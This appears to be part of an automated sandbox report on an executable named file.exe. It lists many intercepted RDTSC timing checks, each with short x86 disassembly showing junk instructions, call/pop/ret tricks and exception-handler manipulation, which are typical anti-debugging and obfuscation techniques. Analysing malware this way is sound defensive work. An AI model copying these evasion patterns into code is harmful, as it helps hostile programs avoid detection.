                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7603 second address: 5D7608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9002 second address: 5D9081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44CEB6DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FBE44CEB6D8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D24EAh], ecx 0x0000002a mov dword ptr [ebp+122D2485h], edi 0x00000030 push 00000000h 0x00000032 jnl 00007FBE44CEB6DAh 0x00000038 adc si, 9415h 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FBE44CEB6D8h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 stc 0x0000005a push eax 0x0000005b push ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9B75 second address: 5D9B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D98C1 second address: 5D98C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9B79 second address: 5D9B87 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBE44D6BDA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9B87 second address: 5D9B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59693E second address: 59695D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007FBE44D6BDA6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FBE44D6BDAEh 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59695D second address: 596963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596963 second address: 596967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDE83 second address: 5DDE9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBE44CEB6E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DED67 second address: 5DED6D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFEC2 second address: 5DFECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FBE44CEB6D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEFBA second address: 5DEFBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFECC second address: 5DFF24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FBE44CEB6D8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 jmp 00007FBE44CEB6E0h 0x0000002c xor dword ptr [ebp+1246E298h], edx 0x00000032 push 00000000h 0x00000034 xor di, 18A0h 0x00000039 push eax 0x0000003a jo 00007FBE44CEB6E0h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEFBE second address: 5DEFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEFC4 second address: 5DEFC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEFC9 second address: 5DEFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0E31 second address: 5E0E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEFD7 second address: 5DEFDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0E37 second address: 5E0E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEFDB second address: 5DEFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEFE1 second address: 5DF092 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBE444F40B8h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FBE444F40A8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov dword ptr [ebp+12455376h], edi 0x0000002c sub dword ptr [ebp+124772CEh], eax 0x00000032 push dword ptr fs:[00000000h] 0x00000039 push ecx 0x0000003a mov ebx, dword ptr [ebp+122D2E70h] 0x00000040 pop edi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 sub dword ptr [ebp+122D3CBDh], edx 0x0000004e mov eax, dword ptr [ebp+122D01A9h] 0x00000054 push 00000000h 0x00000056 push edx 0x00000057 call 00007FBE444F40A8h 0x0000005c pop edx 0x0000005d mov dword ptr [esp+04h], edx 0x00000061 add dword ptr [esp+04h], 0000001Ah 0x00000069 inc edx 0x0000006a push edx 0x0000006b ret 0x0000006c pop edx 0x0000006d ret 0x0000006e add bl, 00000071h 0x00000071 push FFFFFFFFh 0x00000073 nop 0x00000074 push ebx 0x00000075 jmp 00007FBE444F40B0h 0x0000007a pop ebx 0x0000007b push eax 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jno 00007FBE444F40A6h 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E107F second address: 5E1084 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1084 second address: 5E10A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBE444F40B8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E10A7 second address: 5E10AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2F3F second address: 5E2F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2F43 second address: 5E2F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E214C second address: 5E2150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4007 second address: 5E4020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A545h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8E17 second address: 5E8E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E70BA second address: 5E70BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8162 second address: 5E8166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F2A second address: 5E8F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EAC9B second address: 5EAC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EAC9F second address: 5EACB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBE44D3A542h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EACB9 second address: 5EACBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EAD4B second address: 5EAD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E61BD second address: 5E61C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E61C1 second address: 5E61C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E61C5 second address: 5E61CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9FD0 second address: 5E9FED instructions: 0x00000000 rdtsc 0x00000002 js 00007FBE44D3A538h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f jmp 00007FBE44D3A53Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9FED second address: 5EA051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 mov di, E33Ch 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov di, CF75h 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FBE444F40A8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov eax, dword ptr [ebp+122D0CB1h] 0x0000003d push ebx 0x0000003e mov dword ptr [ebp+122D2752h], ecx 0x00000044 pop ebx 0x00000045 push FFFFFFFFh 0x00000047 xor dword ptr [ebp+122D240Fh], edx 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FBE444F40ACh 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA051 second address: 5EA06D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBE44D3A53Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d jng 00007FBE44D3A53Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECD3F second address: 5ECDB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dword ptr [ebp+122D27DDh], ecx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FBE444F40A8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 push 00000000h 0x00000037 pushad 0x00000038 and esi, dword ptr [ebp+122D2E4Ch] 0x0000003e sbb al, 00000016h 0x00000041 popad 0x00000042 push eax 0x00000043 pushad 0x00000044 jnp 00007FBE444F40A8h 0x0000004a push ebx 0x0000004b pop ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FBE444F40B3h 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECF08 second address: 5ECF0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECF0E second address: 5ECF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F7CD9 second address: 5F7D21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBE44D3A546h 0x00000008 je 00007FBE44D3A536h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jns 00007FBE44D3A54Ch 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F7D21 second address: 5F7D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE444F40B6h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F7D3C second address: 5F7D61 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FBE44D3A541h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F7D61 second address: 5F7D6B instructions: 0x00000000 rdtsc 0x00000002 js 00007FBE444F40ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD3FC second address: 5FD424 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBE44D3A53Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBE44D3A546h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD424 second address: 5FD428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD428 second address: 5FD42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDA66 second address: 5FDA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDA6A second address: 5FDA6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDA6E second address: 5FDA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDD52 second address: 5FDD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FBE44D3A538h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDD68 second address: 5FDD6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDD6C second address: 5FDD87 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE44D3A536h 0x00000008 jmp 00007FBE44D3A541h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDD87 second address: 5FDD8C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDF35 second address: 5FDF3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBE44D3A536h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE078 second address: 5FE07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE07C second address: 5FE0AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBE44D3A536h 0x00000008 jnl 00007FBE44D3A536h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jmp 00007FBE44D3A542h 0x00000016 jp 00007FBE44D3A536h 0x0000001c pop ecx 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE0AC second address: 5FE0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBE444F40A6h 0x0000000a jbe 00007FBE444F40A6h 0x00000010 popad 0x00000011 jmp 00007FBE444F40ADh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE4A8 second address: 5FE4C8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE44D3A536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBE44D3A546h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6028FF second address: 602921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FBE444F40A6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602A79 second address: 602A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602A83 second address: 602A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602A8A second address: 602A8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602BEC second address: 602C02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FBE444F40AEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602C02 second address: 602C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602C08 second address: 602C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FBE444F40A6h 0x00000009 jng 00007FBE444F40A6h 0x0000000f jmp 00007FBE444F40ACh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FBE444F40B9h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602F50 second address: 602F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602F56 second address: 602F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602F5A second address: 602F6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A53Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603364 second address: 60336E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE444F40A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60336E second address: 603379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603379 second address: 60337E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6038E1 second address: 6038EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6038EA second address: 6038FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6038FB second address: 60391A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A543h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b js 00007FBE44D3A536h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6093BF second address: 6093D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607F5C second address: 607F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607F60 second address: 607F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607F6A second address: 607F70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607F70 second address: 607F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607F79 second address: 607FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A542h 0x00000009 jmp 00007FBE44D3A549h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FBE44D3A549h 0x00000015 jng 00007FBE44D3A536h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608238 second address: 608262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FBE444F40A6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007FBE444F40B7h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608262 second address: 608266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
